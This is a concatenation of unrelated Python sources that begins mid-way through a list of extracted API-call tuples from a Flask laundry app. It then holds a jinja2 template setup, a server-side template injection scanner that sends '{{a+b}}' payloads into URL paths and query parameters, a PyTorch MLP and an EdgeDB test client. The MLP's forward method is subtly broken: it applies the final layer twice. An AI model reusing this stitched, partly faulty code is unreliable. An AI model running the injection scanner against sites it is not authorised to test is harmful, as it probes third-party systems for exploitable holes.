(hall_no, year, month, day))", 'td', 'get_data'], {}), "('laundry:usage:%s:%s-%s-%s' % (hall_no, year, month, day), td,\n get_data)\n", (6268, 6345), 
False, 'from server.base import cached_route\n'), ((6492, 6507), 'pytz.timezone', 'timezone', (['"""EST"""'], {}), "('EST')\n", (6500, 6507), False, 'from pytz import timezone\n'), ((6518, 6544), 'datetime.datetime.now', 'datetime.datetime.now', (['est'], {}), '(est)\n', (6539, 6544), False, 'import datetime\n'), ((8139, 8164), 'flask.request.form.get', 'request.form.get', (['"""rooms"""'], {}), "('rooms')\n", (8155, 8164), False, 'from flask import g, jsonify, request\n'), ((8653, 8675), 'server.sqldb.session.commit', 'sqldb.session.commit', ([], {}), '()\n', (8673, 8675), False, 'from server import app, sqldb\n'), ((8688, 8729), 'flask.jsonify', 'jsonify', (["{'success': True, 'error': None}"], {}), "({'success': True, 'error': None})\n", (8695, 8729), False, 'from flask import g, jsonify, request\n'), ((8940, 8990), 'server.models.LaundryPreference.query.filter_by', 'LaundryPreference.query.filter_by', ([], {'user_id': 'user.id'}), '(user_id=user.id)\n', (8973, 8990), False, 'from server.models import LaundryPreference, LaundrySnapshot, User\n'), ((9050, 9078), 'flask.jsonify', 'jsonify', (["{'rooms': room_ids}"], {}), "({'rooms': room_ids})\n", (9057, 9078), False, 'from flask import g, jsonify, request\n'), ((9472, 9499), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(1)'}), '(hours=1)\n', (9490, 9499), False, 'import datetime\n'), ((9511, 9556), 'server.base.cached_route', 'cached_route', (['"""laundry:working"""', 'td', 'get_data'], {}), "('laundry:working', td, get_data)\n", (9523, 9556), False, 'from server.base import cached_route\n'), ((889, 914), 'server.penndata.laundry.hall_status', 'laundry.hall_status', (['hall'], {}), '(hall)\n', (908, 914), False, 'from server.penndata import laundry\n'), ((1660, 1675), 'flask.jsonify', 'jsonify', (['to_ret'], {}), '(to_ret)\n', (1667, 1675), False, 'from flask import g, jsonify, request\n'), ((1965, 2005), 'flask.jsonify', 'jsonify', (["{'halls': laundry.hall_id_list}"], {}), "({'halls': laundry.hall_id_list})\n", (1972, 2005), False, 'from flask import g, jsonify, request\n'), ((2568, 2595), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(30)'}), '(days=30)\n', (2586, 2595), False, 'import datetime\n'), ((6768, 6785), 'server.app.app_context', 'app.app_context', ([], {}), '()\n', (6783, 6785), False, 'from server import app, sqldb\n'), ((7078, 7098), 'server.penndata.laundry.all_status', 'laundry.all_status', ([], {}), '()\n', (7096, 7098), False, 'from server.penndata import laundry\n'), ((7859, 7881), 'server.sqldb.session.commit', 'sqldb.session.commit', ([], {}), '()\n', (7879, 7881), False, 'from server import app, sqldb\n'), ((8014, 8034), 'server.models.User.get_or_create', 'User.get_or_create', ([], {}), '()\n', (8032, 8034), False, 'from server.models import LaundryPreference, LaundrySnapshot, User\n'), ((8202, 8261), 'flask.jsonify', 'jsonify', (["{'success': False, 'error': 'No rooms specified.'}"], {}), "({'success': False, 'error': 'No rooms specified.'})\n", (8209, 8261), False, 'from flask import g, jsonify, request\n'), ((8531, 8602), 'server.models.LaundryPreference', 'LaundryPreference', ([], {'user_id': 'user.id', 'account': 'account_id', 'room_id': 'room_id'}), '(user_id=user.id, account=account_id, room_id=room_id)\n', (8548, 8602), False, 'from server.models import LaundryPreference, LaundrySnapshot, User\n'), ((8611, 8648), 'server.sqldb.session.add', 'sqldb.session.add', (['laundry_preference'], {}), '(laundry_preference)\n', (8628, 8648), False, 'from server import app, sqldb\n'), 
((8839, 8859), 'server.models.User.get_or_create', 'User.get_or_create', ([], {}), '()\n', (8857, 8859), False, 'from server.models import LaundryPreference, LaundrySnapshot, User\n'), ((9185, 9211), 'server.penndata.laundry.check_is_working', 'laundry.check_is_working', ([], {}), '()\n', (9209, 9211), False, 'from server.penndata import laundry\n'), ((557, 620), 'flask.jsonify', 'jsonify', (["{'error': 'The laundry api is currently unavailable.'}"], {}), "({'error': 'The laundry api is currently unavailable.'})\n", (564, 620), False, 'from flask import g, jsonify, request\n'), ((1211, 1239), 'server.penndata.laundry.hall_status', 'laundry.hall_status', (['hall_id'], {}), '(hall_id)\n', (1230, 1239), False, 'from server.penndata import laundry\n'), ((1279, 1334), 'flask.jsonify', 'jsonify', (["{'error': 'Invalid hall id passed to server.'}"], {}), "({'error': 'Invalid hall id passed to server.'})\n", (1286, 1334), False, 'from flask import g, jsonify, request\n'), ((1372, 1435), 'flask.jsonify', 'jsonify', (["{'error': 'The laundry api is currently unavailable.'}"], {}), "({'error': 'The laundry api is currently unavailable.'})\n", (1379, 1435), False, 'from flask import g, jsonify, request\n'), ((1714, 1769), 'flask.jsonify', 'jsonify', (["{'error': 'Invalid hall id passed to server.'}"], {}), "({'error': 'Invalid hall id passed to server.'})\n", (1721, 1769), False, 'from flask import g, jsonify, request\n'), ((1807, 1870), 'flask.jsonify', 'jsonify', (["{'error': 'The laundry api is currently unavailable.'}"], {}), "({'error': 'The laundry api is currently unavailable.'})\n", (1814, 1870), False, 'from flask import g, jsonify, request\n'), ((2043, 2106), 'flask.jsonify', 'jsonify', (["{'error': 'The laundry api is currently unavailable.'}"], {}), "({'error': 'The laundry api is currently unavailable.'})\n", (2050, 2106), False, 'from flask import g, jsonify, request\n'), ((7553, 7692), 'server.models.LaundrySnapshot', 'LaundrySnapshot', ([], {'date': 'date', 'time': 'time', 'room': 'id', 'washers': 'washers', 'dryers': 'dryers', 'total_washers': 'total_washers', 'total_dryers': 'total_dryers'}), '(date=date, time=time, room=id, washers=washers, dryers=\n dryers, total_washers=total_washers, total_dryers=total_dryers)\n', (7568, 7692), False, 'from server.models import LaundryPreference, LaundrySnapshot, User\n'), ((7827, 7850), 'server.sqldb.session.add', 'sqldb.session.add', (['item'], {}), '(item)\n', (7844, 7850), False, 'from server import app, sqldb\n'), ((8305, 8355), 'server.models.LaundryPreference.query.filter_by', 'LaundryPreference.query.filter_by', ([], {'user_id': 'user.id'}), '(user_id=user.id)\n', (8338, 8355), False, 'from server.models import LaundryPreference, LaundrySnapshot, User\n'), ((8898, 8920), 'flask.jsonify', 'jsonify', (["{'rooms': []}"], {}), "({'rooms': []})\n", (8905, 8920), False, 'from flask import g, jsonify, request\n'), ((497, 517), 'server.penndata.laundry.all_status', 'laundry.all_status', ([], {}), '()\n', (515, 517), False, 'from server.penndata import laundry\n'), ((1583, 1611), 'server.penndata.laundry.hall_status', 'laundry.hall_status', (['hall_id'], {}), '(hall_id)\n', (1602, 1611), False, 'from server.penndata import laundry\n'), ((1613, 1642), 'server.penndata.laundry.hall_status', 'laundry.hall_status', (['hall_id2'], {}), '(hall_id2)\n', (1632, 1642), False, 'from server.penndata import laundry\n'), ((6831, 6839), 'sqlalchemy.exists', 'exists', ([], {}), '()\n', (6837, 6839), False, 'from sqlalchemy import Integer, cast, exists, func\n'), 
((3388, 3421), 'sqlalchemy.func.avg', 'func.avg', (['LaundrySnapshot.washers'], {}), '(LaundrySnapshot.washers)\n', (3396, 3421), False, 'from sqlalchemy import Integer, cast, exists, func\n'), ((3456, 3488), 'sqlalchemy.func.avg', 'func.avg', (['LaundrySnapshot.dryers'], {}), '(LaundrySnapshot.dryers)\n', (3464, 3488), False, 'from sqlalchemy import Integer, cast, exists, func\n'), ((3522, 3561), 'sqlalchemy.func.avg', 'func.avg', (['LaundrySnapshot.total_washers'], {}), '(LaundrySnapshot.total_washers)\n', (3530, 3561), False, 'from sqlalchemy import Integer, cast, exists, func\n'), ((3602, 3640), 'sqlalchemy.func.avg', 'func.avg', (['LaundrySnapshot.total_dryers'], {}), '(LaundrySnapshot.total_dryers)\n', (3610, 3640), False, 'from sqlalchemy import Integer, cast, exists, func\n'), ((3205, 3242), 'sqlalchemy.func.floor', 'func.floor', (['(LaundrySnapshot.time / 60)'], {}), '(LaundrySnapshot.time / 60)\n', (3215, 3242), False, 'from sqlalchemy import Integer, cast, exists, func\n'), ((3306, 3346), 'sqlalchemy.cast', 'cast', (['(LaundrySnapshot.time / 60)', 'Integer'], {}), '(LaundrySnapshot.time / 60, Integer)\n', (3310, 3346), False, 'from sqlalchemy import Integer, cast, exists, func\n'), ((3825, 3861), 'sqlalchemy.func.dayofweek', 'func.dayofweek', (['LaundrySnapshot.date'], {}), '(LaundrySnapshot.date)\n', (3839, 3861), False, 'from sqlalchemy import Integer, cast, exists, func\n'), ((3938, 3979), 'sqlalchemy.func.strftime', 'func.strftime', (['"""%w"""', 'LaundrySnapshot.date'], {}), "('%w', LaundrySnapshot.date)\n", (3951, 3979), False, 'from sqlalchemy import Integer, cast, exists, func\n'), ((4152, 4188), 'sqlalchemy.func.dayofweek', 'func.dayofweek', (['LaundrySnapshot.date'], {}), '(LaundrySnapshot.date)\n', (4166, 4188), False, 'from sqlalchemy import Integer, cast, exists, func\n'), ((4273, 4314), 'sqlalchemy.func.strftime', 'func.strftime', (['"""%w"""', 'LaundrySnapshot.date'], {}), "('%w', LaundrySnapshot.date)\n", (4286, 4314), False, 'from sqlalchemy import Integer, cast, exists, func\n')]
|
import jinja2
veg_cost = 10.00
non_veg_cost = 10.00
JINJA_ENVIRONMENT = jinja2.Environment(
# templates directory is relative to app root.
loader=jinja2.FileSystemLoader('templates'),
extensions=['jinja2.ext.autoescape'],
autoescape=True)
form_template = JINJA_ENVIRONMENT.get_template('form.html')
pay_template = JINJA_ENVIRONMENT.get_template('paypal.html')
thankyou_template = JINJA_ENVIRONMENT.get_template('thankyou.html')
cancel_template = JINJA_ENVIRONMENT.get_template('cancel.html')
step_by_step_template = JINJA_ENVIRONMENT.get_template('stepbystep.html')
email_template = JINJA_ENVIRONMENT.get_template('email_template.html')
list_template = JINJA_ENVIRONMENT.get_template('list.html')
index_template = JINJA_ENVIRONMENT.get_template('index.html')
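# Minimal rendering sketch (illustrative; the variable names handed to the
# template are assumptions, not taken from form.html):
#
#     html = form_template.render(veg_cost=veg_cost, non_veg_cost=non_veg_cost)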
|
[
"jinja2.FileSystemLoader"
] |
[((152, 188), 'jinja2.FileSystemLoader', 'jinja2.FileSystemLoader', (['"""templates"""'], {}), "('templates')\n", (175, 188), False, 'import jinja2\n')]
|
# coding:utf-8
import logging
from urllib import parse
from copy import deepcopy
import random
import requests
class SSTIDetector:
def __init__(self, results, reports, **kwargs):
self.results = results
self.reports = reports
self.args = kwargs
self.vulnerable = []
@staticmethod
def meta():
return {
'name': 'Server-Side Template Injector for all',
'version': '1.0'
}
@staticmethod
def set_payload():
randint1 = random.randint(32768, 65536)
randint2 = random.randint(16384, 32768)
_sum = randint1 + randint2
_payload = '{{' + str(randint1) + '+' + str(randint2) + '}}'
check_str = str(_sum)
return {'payload': _payload, 'check_str': check_str}
def exec(self):
headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.'
'2924.87 Safari/537.36'
}
for url in self.results['urls']:
logging.critical('SSTI testing on {}'.format(url))
attack_url = []
if url[0:4] != 'http':
url = 'http://' + url
parse_result = parse.urlparse(url)
query = parse.parse_qs(parse_result.query)
split_dir = parse_result.path.split('/')
_url = parse_result.scheme + '://' + parse_result.netloc
for i in range(1, len(split_dir)):
payload = self.set_payload()
split = deepcopy(split_dir)
split[i] = payload['payload']
check_url = _url + '/'.join(split)
attack_url.append({'url': check_url, 'payload': payload})
_url += parse_result.path + '?'
for key in query.keys():
payload = self.set_payload()
tmp = deepcopy(query)
tmp[key][0] = payload['payload']
_query = []
for _key, _value in tmp.items():
_query += list(map(lambda x: '{}={}'.format(_key, x), _value))
attack_url.append({'url': _url + '&'.join(_query), 'payload': payload})
for test_url in attack_url:
req = requests.get(test_url['url'], headers=headers)
if req.text.find(test_url['payload']['check_str']) != -1:
logging.critical('SSTI detected: vulnerable url: {}'.format(test_url['url']))
self.vulnerable.append({
'url': test_url['url'],
'payload': test_url['payload']['payload']
})
self.reports.append({
'title': 'Server Side Template Injection Points',
'overview': 'Found {} SSTI point(s)'.format(len(self.vulnerable)),
'header': ['Path', 'Payload'],
'entries': list(map(lambda x: [x['url'], x['payload']], self.vulnerable))
})
logging.info("SSTI scan finished!")
|
[
"copy.deepcopy",
"random.randint",
"urllib.parse.parse_qs",
"logging.info",
"requests.get",
"urllib.parse.urlparse"
] |
[((518, 546), 'random.randint', 'random.randint', (['(32768)', '(65536)'], {}), '(32768, 65536)\n', (532, 546), False, 'import random\n'), ((566, 594), 'random.randint', 'random.randint', (['(16384)', '(32768)'], {}), '(16384, 32768)\n', (580, 594), False, 'import random\n'), ((2999, 3034), 'logging.info', 'logging.info', (['"""SSTI scan finished!"""'], {}), "('SSTI scan finished!')\n", (3011, 3034), False, 'import logging\n'), ((1246, 1265), 'urllib.parse.urlparse', 'parse.urlparse', (['url'], {}), '(url)\n', (1260, 1265), False, 'from urllib import parse\n'), ((1286, 1320), 'urllib.parse.parse_qs', 'parse.parse_qs', (['parse_result.query'], {}), '(parse_result.query)\n', (1300, 1320), False, 'from urllib import parse\n'), ((1561, 1580), 'copy.deepcopy', 'deepcopy', (['split_dir'], {}), '(split_dir)\n', (1569, 1580), False, 'from copy import deepcopy\n'), ((1902, 1917), 'copy.deepcopy', 'deepcopy', (['query'], {}), '(query)\n', (1910, 1917), False, 'from copy import deepcopy\n'), ((2278, 2324), 'requests.get', 'requests.get', (["test_url['url']"], {'headers': 'headers'}), "(test_url['url'], headers=headers)\n", (2290, 2324), False, 'import requests\n')]
|
import torch
from torch import nn
import os
############################################
############################################
class MLP(nn.Module):
def __init__(self, input_size, output_size, n_layers, size, activation=torch.tanh, output_activation=None):
super(MLP, self).__init__()
self.activation = activation
self.output_activation = output_activation
self.layers = nn.ModuleList()
in_ = input_size
for i in range(n_layers):
self.layers.append(nn.Linear(in_, size))
in_ = size
self.layers.append(nn.Linear(size, output_size))
    def forward(self, x):
        # Apply the hidden activation to all but the final layer; the final
        # layer stays linear unless an output activation was supplied.
        for layer in self.layers[:-1]:
            x = self.activation(layer(x))
        x = self.layers[-1](x)
        if self.output_activation is None:
            return x
        else:
            return self.output_activation(x)
############################################
############################################
def lrelu(x, leak=0.2):
f1 = 0.5 * (1 + leak)
f2 = 0.5 * (1 - leak)
return f1 * x + f2 * abs(x)
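# Minimal smoke test (illustrative, not from the original module): build a
# 2-hidden-layer MLP and push a random batch through it.
if __name__ == '__main__':
    net = MLP(input_size=4, output_size=2, n_layers=2, size=64)
    out = net(torch.randn(8, 4))
    print(out.shape)  # expected: torch.Size([8, 2])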
|
[
"torch.nn.Linear",
"torch.nn.ModuleList"
] |
[((416, 431), 'torch.nn.ModuleList', 'nn.ModuleList', ([], {}), '()\n', (429, 431), False, 'from torch import nn\n'), ((595, 623), 'torch.nn.Linear', 'nn.Linear', (['size', 'output_size'], {}), '(size, output_size)\n', (604, 623), False, 'from torch import nn\n'), ((522, 542), 'torch.nn.Linear', 'nn.Linear', (['in_', 'size'], {}), '(in_, size)\n', (531, 542), False, 'from torch import nn\n')]
|
#
# This source file is part of the EdgeDB open source project.
#
# Copyright 2016-present MagicStack Inc. and the EdgeDB authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A specialized client API for EdgeDB tests.
Historically EdgeDB tests relied on a very specific client API that
is no longer supported by edgedb-python. Here we implement that API
(for example, transactions can be nested and are non-retrying).
"""
from __future__ import annotations
import typing
import abc
import asyncio
import enum
import functools
import random
import socket
import ssl
import time
from edgedb import abstract
from edgedb import errors
from edgedb import con_utils
from edgedb import enums as edgedb_enums
from edgedb import options
from edgedb.protocol import asyncio_proto # type: ignore
from edgedb.protocol import protocol # type: ignore
class TransactionState(enum.Enum):
NEW = 0
STARTED = 1
COMMITTED = 2
ROLLEDBACK = 3
FAILED = 4
class BaseTransaction(abc.ABC):
ID_COUNTER = 0
def __init__(self, owner):
self._connection = owner
self._state = TransactionState.NEW
self._managed = False
self._nested = False
type(self).ID_COUNTER += 1
self._id = f'raw_tx_{self.ID_COUNTER}'
def is_active(self) -> bool:
return self._state is TransactionState.STARTED
def __check_state_base(self, opname):
if self._state is TransactionState.COMMITTED:
raise errors.InterfaceError(
f'cannot {opname}; the transaction is already committed')
if self._state is TransactionState.ROLLEDBACK:
raise errors.InterfaceError(
f'cannot {opname}; the transaction is already rolled back')
if self._state is TransactionState.FAILED:
raise errors.InterfaceError(
f'cannot {opname}; the transaction is in error state')
def __check_state(self, opname):
if self._state is not TransactionState.STARTED:
if self._state is TransactionState.NEW:
raise errors.InterfaceError(
f'cannot {opname}; the transaction is not yet started')
self.__check_state_base(opname)
def _make_start_query(self):
self.__check_state_base('start')
if self._state is TransactionState.STARTED:
raise errors.InterfaceError(
'cannot start; the transaction is already started')
return self._make_start_query_inner()
@abc.abstractmethod
def _make_start_query_inner(self):
...
def _make_commit_query(self):
self.__check_state('commit')
return 'COMMIT;'
def _make_rollback_query(self):
self.__check_state('rollback')
if self._connection._top_xact is self:
self._connection._top_xact = None
if self._nested:
query = f'ROLLBACK TO SAVEPOINT {self._id};'
else:
query = 'ROLLBACK;'
return query
async def start(self) -> None:
query = self._make_start_query()
try:
await self._connection.execute(query)
except BaseException:
self._state = TransactionState.FAILED
raise
else:
self._state = TransactionState.STARTED
async def commit(self) -> None:
if self._managed:
raise errors.InterfaceError(
'cannot manually commit from within an `async with` block')
await self._commit()
async def _commit(self) -> None:
query = self._make_commit_query()
try:
await self._connection.execute(query)
except BaseException:
self._state = TransactionState.FAILED
raise
else:
self._state = TransactionState.COMMITTED
async def rollback(self) -> None:
if self._managed:
raise errors.InterfaceError(
'cannot manually rollback from within an `async with` block')
await self._rollback()
async def _rollback(self) -> None:
query = self._make_rollback_query()
try:
await self._connection.execute(query)
except BaseException:
self._state = TransactionState.FAILED
raise
else:
self._state = TransactionState.ROLLEDBACK
class RawTransaction(BaseTransaction):
def _make_start_query_inner(self):
con = self._connection
if con._top_xact is None:
con._top_xact = self
else:
# Nested transaction block
self._nested = True
if self._nested:
query = f'DECLARE SAVEPOINT {self._id};'
else:
query = 'START TRANSACTION;'
return query
def _make_commit_query(self):
query = super()._make_commit_query()
if self._connection._top_xact is self:
self._connection._top_xact = None
if self._nested:
query = f'RELEASE SAVEPOINT {self._id};'
return query
def _make_rollback_query(self):
query = super()._make_rollback_query()
if self._connection._top_xact is self:
self._connection._top_xact = None
if self._nested:
query = f'ROLLBACK TO SAVEPOINT {self._id};'
return query
async def __aenter__(self):
if self._managed:
raise errors.InterfaceError(
'cannot enter context: already in an `async with` block')
self._managed = True
await self.start()
return self
async def __aexit__(self, extype, ex, tb):
try:
if extype is not None:
await self._rollback()
else:
await self._commit()
finally:
self._managed = False
class Iteration(BaseTransaction, abstract.AsyncIOExecutor):
def __init__(self, retry, connection, iteration):
super().__init__(connection)
self._options = retry._options.transaction_options
self.__retry = retry
self.__iteration = iteration
self.__started = False
async def __aenter__(self):
if self._managed:
raise errors.InterfaceError(
'cannot enter context: already in an `async with` block')
self._managed = True
return self
async def __aexit__(self, extype, ex, tb):
self._managed = False
if not self.__started:
return False
try:
if extype is None:
await self._commit()
else:
await self._rollback()
except errors.EdgeDBError as err:
if ex is None:
                # On commit we cannot tell whether the commit succeeded: the
                # network may have dropped before the database received it,
                # or after it was applied but before we got a response.
raise err
# If we were going to rollback, look at original error
# to find out whether we want to retry, regardless of
# the rollback error.
            # In this case we ignore the rollback issue, as the original
            # error is more important; e.g. a `CancelledError` must be
            # propagated to cancel the whole task.
# NOTE: rollback error is always swallowed, should we use
# on_log_message for it?
if (
extype is not None and
issubclass(extype, errors.EdgeDBError) and
ex.has_tag(errors.SHOULD_RETRY)
):
return self.__retry._retry(ex)
def _make_start_query_inner(self):
return self._options.start_transaction_query()
def _get_query_cache(self) -> abstract.QueryCache:
return self._connection._query_cache
async def _query(self, query_context: abstract.QueryContext):
await self._ensure_transaction()
result, _ = await self._connection.raw_query(query_context)
return result
async def execute(self, query: str) -> None:
await self._ensure_transaction()
await self._connection.execute(query)
async def _ensure_transaction(self):
if not self._managed:
raise errors.InterfaceError(
"Only managed retriable transactions are supported. "
"Use `async with transaction:`"
)
if not self.__started:
self.__started = True
if self._connection.is_closed():
await self._connection.connect(
single_attempt=self.__iteration != 0
)
await self.start()
class Retry:
def __init__(self, connection):
self._connection = connection
self._iteration = 0
self._done = False
self._next_backoff = 0
self._options = connection._options
def _retry(self, exc):
self._last_exception = exc
rule = self._options.retry_options.get_rule_for_exception(exc)
if self._iteration >= rule.attempts:
return False
self._done = False
self._next_backoff = rule.backoff(self._iteration)
return True
def __aiter__(self):
return self
async def __anext__(self):
# Note: when changing this code consider also
# updating Retry.__next__.
if self._done:
raise StopAsyncIteration
if self._next_backoff:
await asyncio.sleep(self._next_backoff)
self._done = True
iteration = Iteration(self, self._connection, self._iteration)
self._iteration += 1
return iteration
class Connection(options._OptionsMixin, abstract.AsyncIOExecutor):
_top_xact: RawTransaction | None = None
def __init__(self, connect_args, *, test_no_tls=False):
super().__init__()
self._connect_args = connect_args
self._protocol = None
self._query_cache = abstract.QueryCache(
codecs_registry=protocol.CodecsRegistry(),
query_cache=protocol.QueryCodecsCache(),
)
self._test_no_tls = test_no_tls
self._params = None
self._log_listeners = set()
def add_log_listener(self, callback):
self._log_listeners.add(callback)
def remove_log_listener(self, callback):
self._log_listeners.discard(callback)
def _on_log_message(self, msg):
if self._log_listeners:
loop = asyncio.get_running_loop()
for cb in self._log_listeners:
loop.call_soon(cb, self, msg)
def _shallow_clone(self):
con = self.__class__.__new__(self.__class__)
con._connect_args = self._connect_args
con._protocol = self._protocol
con._query_cache = self._query_cache
con._test_no_tls = self._test_no_tls
con._params = self._params
return con
def _get_query_cache(self) -> abstract.QueryCache:
return self._query_cache
async def _query(self, query_context: abstract.QueryContext):
await self.ensure_connected()
result, _ = await self.raw_query(query_context)
return result
async def execute(self, query: str) -> None:
await self.ensure_connected()
await self._protocol.simple_query(
query, edgedb_enums.Capability.ALL # type: ignore
)
async def ensure_connected(self):
if self.is_closed():
await self.connect()
return self
async def raw_query(self, query_context: abstract.QueryContext):
return await self._protocol.execute_anonymous(
query=query_context.query.query,
args=query_context.query.args,
kwargs=query_context.query.kwargs,
reg=query_context.cache.codecs_registry,
qc=query_context.cache.query_cache,
io_format=query_context.query_options.io_format,
expect_one=query_context.query_options.expect_one,
required_one=query_context.query_options.required_one,
allow_capabilities=edgedb_enums.Capability.ALL, # type: ignore
)
async def _fetchall(
self,
query: str,
*args,
__limit__: int = 0,
__typeids__: bool = False,
__typenames__: bool = False,
__allow_capabilities__: typing.Optional[int] = None,
**kwargs,
):
await self.ensure_connected()
result, _ = await self._protocol.execute_anonymous(
query=query,
args=args,
kwargs=kwargs,
reg=self._query_cache.codecs_registry,
qc=self._query_cache.query_cache,
implicit_limit=__limit__,
inline_typeids=__typeids__,
inline_typenames=__typenames__,
io_format=protocol.IoFormat.BINARY,
allow_capabilities=__allow_capabilities__,
)
return result
async def _fetchall_with_headers(
self,
query: str,
*args,
__limit__: int = 0,
__typeids__: bool = False,
__typenames__: bool = False,
__allow_capabilities__: typing.Optional[int] = None,
**kwargs,
):
await self.ensure_connected()
return await self._protocol.execute_anonymous(
query=query,
args=args,
kwargs=kwargs,
reg=self._query_cache.codecs_registry,
qc=self._query_cache.query_cache,
implicit_limit=__limit__,
inline_typeids=__typeids__,
inline_typenames=__typenames__,
io_format=protocol.IoFormat.BINARY,
allow_capabilities=__allow_capabilities__,
)
async def _fetchall_json(
self,
query: str,
*args,
__limit__: int = 0,
**kwargs,
):
await self.ensure_connected()
result, _ = await self._protocol.execute_anonymous(
query=query,
args=args,
kwargs=kwargs,
reg=self._query_cache.codecs_registry,
qc=self._query_cache.query_cache,
implicit_limit=__limit__,
inline_typenames=False,
io_format=protocol.IoFormat.JSON,
)
return result
async def _fetchall_json_elements(self, query: str, *args, **kwargs):
await self.ensure_connected()
result, _ = await self._protocol.execute_anonymous(
query=query,
args=args,
kwargs=kwargs,
reg=self._query_cache.codecs_registry,
qc=self._query_cache.query_cache,
io_format=protocol.IoFormat.JSON_ELEMENTS,
allow_capabilities=edgedb_enums.Capability.EXECUTE, # type: ignore
)
return result
def _clear_codecs_cache(self):
self._query_cache.codecs_registry.clear_cache()
def _get_last_status(self) -> typing.Optional[str]:
if self._protocol is None:
return None
status = self._protocol.last_status
if status is not None:
status = status.decode()
return status
def is_closed(self):
return self._protocol is None or not self._protocol.connected
async def connect(self, single_attempt=False):
self._params, client_config = con_utils.parse_connect_arguments(
**self._connect_args,
command_timeout=None,
server_settings=None,
)
start = time.monotonic()
if single_attempt:
max_time = 0
else:
max_time = start + client_config.wait_until_available
iteration = 1
while True:
addr = self._params.address
try:
await asyncio.wait_for(
self.connect_addr(),
client_config.connect_timeout,
)
except TimeoutError as e:
if iteration > 1 and time.monotonic() >= max_time:
raise errors.ClientConnectionTimeoutError(
f"connecting to {addr} failed in"
f" {client_config.connect_timeout} sec"
) from e
except errors.ClientConnectionError as e:
if (
not e.has_tag(errors.SHOULD_RECONNECT) or
(iteration > 1 and time.monotonic() >= max_time)
):
nice_err = e.__class__(
con_utils.render_client_no_connection_error(
e,
addr,
attempts=iteration,
duration=time.monotonic() - start,
))
raise nice_err from e.__cause__
else:
return
iteration += 1
await asyncio.sleep(0.01 + random.random() * 0.2)
async def connect_addr(self):
tr = None
loop = asyncio.get_running_loop()
addr = self._params.address
protocol_factory = functools.partial(
asyncio_proto.AsyncIOProtocol, self._params, loop
)
try:
if isinstance(addr, str):
# UNIX socket
tr, pr = await loop.create_unix_connection(
protocol_factory, addr
)
elif self._test_no_tls:
tr, pr = await loop.create_connection(protocol_factory, *addr)
else:
try:
tr, pr = await loop.create_connection(
protocol_factory, *addr, ssl=self._params.ssl_ctx
)
except ssl.CertificateError as e:
raise con_utils.wrap_error(e) from e
except ssl.SSLError as e:
if e.reason == 'CERTIFICATE_VERIFY_FAILED':
raise con_utils.wrap_error(e) from e
tr, pr = await loop.create_connection(
functools.partial(protocol_factory, tls_compat=True),
*addr,
)
else:
con_utils.check_alpn_protocol(
tr.get_extra_info('ssl_object')
)
except socket.gaierror as e:
# All name resolution errors are considered temporary
raise errors.ClientConnectionFailedTemporarilyError(str(e)) from e
except OSError as e:
raise con_utils.wrap_error(e) from e
except Exception:
if tr is not None:
tr.close()
raise
pr.set_connection(self)
try:
await pr.connect()
except OSError as e:
if tr is not None:
tr.close()
raise con_utils.wrap_error(e) from e
except BaseException:
if tr is not None:
tr.close()
raise
self._protocol = pr
def retrying_transaction(self) -> Retry:
return Retry(self)
def transaction(self) -> RawTransaction:
return RawTransaction(self)
def is_in_transaction(self):
return self._protocol.is_in_transaction()
def get_settings(self) -> typing.Dict[str, typing.Any]:
return self._protocol.get_settings()
@property
def dbname(self) -> str:
return self._params.database
def connected_addr(self):
return self._params.address
async def aclose(self):
if not self.is_closed():
try:
self._protocol.terminate()
await self._protocol.wait_for_disconnect()
except (Exception, asyncio.CancelledError):
self.terminate()
raise
def terminate(self):
if not self.is_closed():
self._protocol.abort()
async def async_connect_test_client(
dsn: str = None,
host: str = None,
port: int = None,
credentials: str = None,
credentials_file: str = None,
user: str = None,
password: str = None,
database: str = None,
tls_ca: str = None,
tls_ca_file: str = None,
tls_security: str = None,
test_no_tls: bool = False,
wait_until_available: int = 30,
timeout: int = 10,
) -> Connection:
return await Connection(
{
"dsn": dsn,
"host": host,
"port": port,
"credentials": credentials,
"credentials_file": credentials_file,
"user": user,
"password": password,
"database": database,
"timeout": timeout,
"tls_ca": tls_ca,
"tls_ca_file": tls_ca_file,
"tls_security": tls_security,
"wait_until_available": wait_until_available,
},
test_no_tls=test_no_tls,
).ensure_connected()
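# Illustrative usage sketch (not part of the module). Host, port and database
# below are placeholders; running this requires a reachable EdgeDB test
# instance.
async def _demo():
    con = await async_connect_test_client(
        host='localhost', port=5656, database='edgedb')
    async with con.transaction():
        await con.execute('SELECT 1;')
    await con.aclose()

if __name__ == '__main__':
    asyncio.run(_demo())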
|
[
"functools.partial",
"edgedb.con_utils.parse_connect_arguments",
"asyncio.sleep",
"edgedb.protocol.protocol.CodecsRegistry",
"edgedb.protocol.protocol.QueryCodecsCache",
"edgedb.errors.InterfaceError",
"asyncio.get_running_loop",
"random.random",
"time.monotonic",
"edgedb.errors.ClientConnectionTimeoutError",
"edgedb.con_utils.wrap_error"
] |
[((15785, 15889), 'edgedb.con_utils.parse_connect_arguments', 'con_utils.parse_connect_arguments', ([], {'command_timeout': 'None', 'server_settings': 'None'}), '(**self._connect_args, command_timeout=\n None, server_settings=None)\n', (15818, 15889), False, 'from edgedb import con_utils\n'), ((15948, 15964), 'time.monotonic', 'time.monotonic', ([], {}), '()\n', (15962, 15964), False, 'import time\n'), ((17458, 17484), 'asyncio.get_running_loop', 'asyncio.get_running_loop', ([], {}), '()\n', (17482, 17484), False, 'import asyncio\n'), ((17548, 17616), 'functools.partial', 'functools.partial', (['asyncio_proto.AsyncIOProtocol', 'self._params', 'loop'], {}), '(asyncio_proto.AsyncIOProtocol, self._params, loop)\n', (17565, 17616), False, 'import functools\n'), ((1976, 2055), 'edgedb.errors.InterfaceError', 'errors.InterfaceError', (['f"""cannot {opname}; the transaction is already committed"""'], {}), "(f'cannot {opname}; the transaction is already committed')\n", (1997, 2055), False, 'from edgedb import errors\n'), ((2146, 2232), 'edgedb.errors.InterfaceError', 'errors.InterfaceError', (['f"""cannot {opname}; the transaction is already rolled back"""'], 